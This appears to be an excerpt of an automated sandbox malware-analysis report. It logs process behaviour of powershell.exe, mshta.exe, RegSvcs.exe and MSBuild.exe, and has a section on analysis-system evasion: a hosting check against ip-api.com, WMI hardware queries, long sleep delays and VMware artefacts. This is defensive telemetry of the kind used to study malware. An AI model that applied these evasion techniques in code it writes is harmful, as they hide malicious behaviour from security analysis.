              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeMemory allocated: 10B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeMemory allocated: 4D30000 memory commit | memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeMemory allocated: 1770000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeMemory allocated: 33C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeMemory allocated: 53C0000 memory commit | memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599388Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599260Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599047Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598826Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597951Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596266Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596044Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595936Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595815Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595592Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595458Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594992Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594710Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4844Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5033Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3261Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6566Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4553
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5200
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4354
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5459
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2428Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep time: -26747778906878833s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 7588Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep time: -30437127721620741s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599388Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599260Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599047Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598826Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597951Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596266Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596044Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595936Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595815Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595592Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595458Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594992Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594710Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: Amcache.hve.10.drBinary or memory string: VMware
              Source: ModuleAnalysisCache.0.drBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
